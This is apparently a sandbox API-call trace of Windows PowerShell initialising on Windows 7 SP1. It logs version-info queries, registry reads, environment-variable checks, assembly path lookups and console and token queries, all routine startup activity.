	[0852.276] GetWindowThreadProcessId (in: hWnd=0x10170, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0xb0
	[0854.037] WerSetFlags () returned 0x0
	[0854.048] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1
	[0854.048] CoTaskMemFree (pv=0x0) 
	[0854.049] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0xcdf28, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0xcdf20 | out: pulNumLanguages=0xcdf28, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0xcdf20) returned 1
	[0854.049] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0xcdf28, pwszLanguagesBuffer=0x2f465f0, pcchLanguagesBuffer=0xcdf20 | out: pulNumLanguages=0xcdf28, pwszLanguagesBuffer=0x2f465f0, pcchLanguagesBuffer=0xcdf20) returned 1
	[0854.067] CoTaskMemAlloc (cb=0x24) returned 0x33a070
	[0854.067] GetUserDefaultLocaleName (in: lpLocaleName=0x33a070, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6
	[0854.068] CoTaskMemFree (pv=0x33a070) 
	[0855.244] CoTaskMemAlloc (cb=0x104) returned 0x285e00
	[0855.244] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x285e00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0855.244] CoTaskMemFree (pv=0x285e00) 
	[0855.246] CoTaskMemAlloc (cb=0x104) returned 0x285e00
	[0855.246] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x285e00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0855.247] CoTaskMemFree (pv=0x285e00) 
	[0855.249] CoTaskMemAlloc (cb=0x104) returned 0x285e00
	[0855.249] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x285e00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0855.249] CoTaskMemFree (pv=0x285e00) 
	[0855.299] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0855.299] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0855.299] SetErrorMode (uMode=0x1) returned 0x1
	[0855.299] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0xcdba0 | out: lpFileInformation=0xcdba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0855.299] SetErrorMode (uMode=0x1) returned 0x1
	[0855.300] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0xcde10 | out: lpdwHandle=0xcde10) returned 0x94c
	[0855.301] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2f49e80 | out: lpData=0x2f49e80) returned 1
	[0855.302] VerQueryValueW (in: pBlock=0x2f49e80, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xcdd88, puLen=0xcdd80 | out: lplpBuffer=0xcdd88*=0x2f49f1c, puLen=0xcdd80) returned 1
	[0855.302] VerQueryValueW (in: pBlock=0x2f49e80, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0xcdcf8, puLen=0xcdcf0 | out: lplpBuffer=0xcdcf8*=0x2f49ff8, puLen=0xcdcf0) returned 1
	[0855.302] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0855.302] CoTaskMemAlloc (cb=0x2e) returned 0x338dd0
	[0855.302] lstrcpyW (in: lpString1=0x338dd0, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0855.302] CoTaskMemFree (pv=0x338dd0) 
	[0855.302] VerQueryValueW (in: pBlock=0x2f49e80, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0xcdcf8, puLen=0xcdcf0 | out: lplpBuffer=0xcdcf8*=0x2f4a04c, puLen=0xcdcf0) returned 1
	[0855.302] lstrlenW (lpString="System.Management.Automation") returned 28
	[0855.302] CoTaskMemAlloc (cb=0x3c) returned 0x2a90a0
	[0855.302] lstrcpyW (in: lpString1=0x2a90a0, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0855.302] CoTaskMemFree (pv=0x2a90a0) 
	[0855.303] VerQueryValueW (in: pBlock=0x2f49e80, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0xcdcf8, puLen=0xcdcf0 | out: lplpBuffer=0xcdcf8*=0x2f4a0a8, puLen=0xcdcf0) returned 1
	[0855.303] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0855.303] CoTaskMemAlloc (cb=0x20) returned 0x33a0d0
	[0855.303] lstrcpyW (in: lpString1=0x33a0d0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0855.303] CoTaskMemFree (pv=0x33a0d0) 
	[0855.303] VerQueryValueW (in: pBlock=0x2f49e80, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0xcdcf8, puLen=0xcdcf0 | out: lplpBuffer=0xcdcf8*=0x2f4a0e8, puLen=0xcdcf0) returned 1
	[0855.303] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0855.303] CoTaskMemAlloc (cb=0x44) returned 0x2a90a0
	[0855.303] lstrcpyW (in: lpString1=0x2a90a0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0855.303] CoTaskMemFree (pv=0x2a90a0) 
	[0855.303] VerQueryValueW (in: pBlock=0x2f49e80, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0xcdcf8, puLen=0xcdcf0 | out: lplpBuffer=0xcdcf8*=0x2f4a150, puLen=0xcdcf0) returned 1
	[0855.303] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0855.303] CoTaskMemAlloc (cb=0x76) returned 0x2cef90
	[0855.303] lstrcpyW (in: lpString1=0x2cef90, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0855.303] CoTaskMemFree (pv=0x2cef90) 
	[0855.303] VerQueryValueW (in: pBlock=0x2f49e80, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0xcdcf8, puLen=0xcdcf0 | out: lplpBuffer=0xcdcf8*=0x2f4a1ec, puLen=0xcdcf0) returned 1
	[0855.303] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0855.303] CoTaskMemAlloc (cb=0x44) returned 0x2a90a0
	[0855.304] lstrcpyW (in: lpString1=0x2a90a0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0855.304] CoTaskMemFree (pv=0x2a90a0) 
	[0855.304] VerQueryValueW (in: pBlock=0x2f49e80, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0xcdcf8, puLen=0xcdcf0 | out: lplpBuffer=0xcdcf8*=0x2f4a250, puLen=0xcdcf0) returned 1
	[0855.304] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0855.304] CoTaskMemAlloc (cb=0x58) returned 0x28adf0
	[0855.304] lstrcpyW (in: lpString1=0x28adf0, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0855.304] CoTaskMemFree (pv=0x28adf0) 
	[0855.304] VerQueryValueW (in: pBlock=0x2f49e80, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0xcdcf8, puLen=0xcdcf0 | out: lplpBuffer=0xcdcf8*=0x2f4a2cc, puLen=0xcdcf0) returned 1
	[0855.304] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0855.304] CoTaskMemAlloc (cb=0x20) returned 0x33a0d0
	[0855.304] lstrcpyW (in: lpString1=0x33a0d0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0855.304] CoTaskMemFree (pv=0x33a0d0) 
	[0855.304] VerQueryValueW (in: pBlock=0x2f49e80, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0xcdcf8, puLen=0xcdcf0 | out: lplpBuffer=0xcdcf8*=0x2f49f74, puLen=0xcdcf0) returned 1
	[0855.304] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0855.304] CoTaskMemAlloc (cb=0x66) returned 0x32e660
	[0855.304] lstrcpyW (in: lpString1=0x32e660, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0855.304] CoTaskMemFree (pv=0x32e660) 
	[0855.305] VerQueryValueW (in: pBlock=0x2f49e80, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0xcdcf8, puLen=0xcdcf0 | out: lplpBuffer=0xcdcf8*=0x0, puLen=0xcdcf0) returned 0
	[0855.305] VerQueryValueW (in: pBlock=0x2f49e80, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0xcdcf8, puLen=0xcdcf0 | out: lplpBuffer=0xcdcf8*=0x0, puLen=0xcdcf0) returned 0
	[0855.305] VerQueryValueW (in: pBlock=0x2f49e80, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0xcdcf8, puLen=0xcdcf0 | out: lplpBuffer=0xcdcf8*=0x0, puLen=0xcdcf0) returned 0
	[0855.305] VerQueryValueW (in: pBlock=0x2f49e80, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xcdcc8, puLen=0xcdcc0 | out: lplpBuffer=0xcdcc8*=0x2f49f1c, puLen=0xcdcc0) returned 1
	[0855.305] CoTaskMemAlloc (cb=0x204) returned 0x2d1e00
	[0855.305] VerLanguageNameW (in: wLang=0x0, szLang=0x2d1e00, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0855.305] CoTaskMemFree (pv=0x2d1e00) 
	[0855.305] VerQueryValueW (in: pBlock=0x2f49e80, lpSubBlock="\\", lplpBuffer=0xcdd18, puLen=0xcdd10 | out: lplpBuffer=0xcdd18*=0x2f49ea8, puLen=0xcdd10) returned 1
	[0856.758] CoTaskMemAlloc (cb=0x104) returned 0x285e00
	[0856.758] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x285e00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0856.758] CoTaskMemFree (pv=0x285e00) 
	[0856.763] CoTaskMemAlloc (cb=0x104) returned 0x285e00
	[0856.763] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x285e00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0856.763] CoTaskMemFree (pv=0x285e00) 
	[0856.767] lstrlenW (lpString="䅁") returned 1
	[0856.777] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcdbe8 | out: phkResult=0xcdbe8*=0x2fc) returned 0x0
	[0856.778] RegOpenKeyExW (in: hKey=0x2fc, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0xcdbd8 | out: phkResult=0xcdbd8*=0x300) returned 0x0
	[0856.778] RegOpenKeyExW (in: hKey=0x300, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xcdc68 | out: phkResult=0xcdc68*=0x304) returned 0x0
	[0856.780] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcdbac, lpData=0x0, lpcbData=0xcdba8*=0x0 | out: lpType=0xcdbac*=0x1, lpData=0x0, lpcbData=0xcdba8*=0x56) returned 0x0
	[0856.781] CoTaskMemAlloc (cb=0x5a) returned 0x32e5f0
	[0856.782] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcdb7c, lpData=0x32e5f0, lpcbData=0xcdb78*=0x56 | out: lpType=0xcdb7c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xcdb78*=0x56) returned 0x0
	[0856.782] CoTaskMemFree (pv=0x32e5f0) 
	[0857.940] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0857.942] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0857.951] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0857.970] CoTaskMemAlloc (cb=0x104) returned 0x285e00
	[0857.970] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x285e00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0857.970] CoTaskMemFree (pv=0x285e00) 
	[0864.036] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0xcd7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0864.036] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0xcd7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0866.926] CoTaskMemAlloc (cb=0x104) returned 0x285f10
	[0866.926] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x285f10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0866.926] CoTaskMemFree (pv=0x285f10) 
	[0866.928] CoTaskMemAlloc (cb=0x104) returned 0x285f10
	[0866.928] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x285f10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0866.928] CoTaskMemFree (pv=0x285f10) 
	[0867.740] CoTaskMemAlloc (cb=0x104) returned 0x285f10
	[0867.740] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x285f10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0867.740] CoTaskMemFree (pv=0x285f10) 
	[0867.742] CoTaskMemAlloc (cb=0x104) returned 0x285f10
	[0867.742] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x285f10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0867.742] CoTaskMemFree (pv=0x285f10) 
	[0867.743] CoTaskMemAlloc (cb=0x104) returned 0x285f10
	[0867.743] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x285f10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0867.743] CoTaskMemFree (pv=0x285f10) 
	[0873.853] CoTaskMemAlloc (cb=0x104) returned 0x285f10
	[0873.853] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x285f10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0873.853] CoTaskMemFree (pv=0x285f10) 
	[0873.857] CoTaskMemAlloc (cb=0x104) returned 0x285f10
	[0873.857] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x285f10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0873.857] CoTaskMemFree (pv=0x285f10) 
	[0874.449] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0874.449] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0900.365] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0xcd7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0900.365] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0xcd7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0900.393] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0900.393] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0915.478] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xcd7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0915.478] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xcd7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0926.607] CoTaskMemAlloc (cb=0x104) returned 0x286130
	[0926.607] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x286130, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0926.607] CoTaskMemFree (pv=0x286130) 
	[0926.607] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0926.608] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0926.608] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0928.874] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0xcd8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0928.874] SetErrorMode (uMode=0x1) returned 0x1
	[0928.874] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0xcdb40 | out: lpFileInformation=0xcdb40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0928.875] SetErrorMode (uMode=0x1) returned 0x1
	[0962.704] CoTaskMemAlloc (cb=0x104) returned 0x286130
	[0962.704] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x286130, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0962.704] CoTaskMemFree (pv=0x286130) 
	[0962.705] CoTaskMemAlloc (cb=0x104) returned 0x286130
	[0962.705] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x286130, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0962.705] CoTaskMemFree (pv=0x286130) 
	[0962.706] CoTaskMemAlloc (cb=0x104) returned 0x286130
	[0962.706] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x286130, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0962.706] CoTaskMemFree (pv=0x286130) 
	[0962.707] CoCreateGuid (in: pguid=0xcdf08 | out: pguid=0xcdf08*(Data1=0x32dbda85, Data2=0xdade, Data3=0x4607, Data4=([0]=0xaa, [1]=0x61, [2]=0xa0, [3]=0x73, [4]=0xbc, [5]=0x96, [6]=0x19, [7]=0xb8))) returned 0x0
	[0962.711] CoTaskMemAlloc (cb=0x104) returned 0x286130
	[0962.711] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x286130, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0962.711] CoTaskMemFree (pv=0x286130) 
	[0962.714] CoTaskMemAlloc (cb=0x104) returned 0x286130
	[0962.714] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x286130, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0962.714] CoTaskMemFree (pv=0x286130) 
	[0962.716] CoTaskMemAlloc (cb=0x104) returned 0x286130
	[0962.716] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x286130, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0962.716] CoTaskMemFree (pv=0x286130) 
	[0962.740] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf
	[0963.063] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0xcdbb0 | out: lpConsoleScreenBufferInfo=0xcdbb0) returned 1
	[0963.078] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13
	[0963.079] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0xcdbb0 | out: lpConsoleScreenBufferInfo=0xcdbb0) returned 1
	[0963.080] GetVersionExW (in: lpVersionInformation=0xcdb40*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0xcdb40*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0963.083] GetCurrentProcess () returned 0xffffffffffffffff
	[0963.084] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0xcdbd8 | out: TokenHandle=0xcdbd8*=0xe4) returned 1
	[0963.088] GetTokenInformation (in: TokenHandle=0xe4, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xcdaf8 | out: TokenInformation=0x0, ReturnLength=0xcdaf8) returned 0
	[0963.089] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x297320
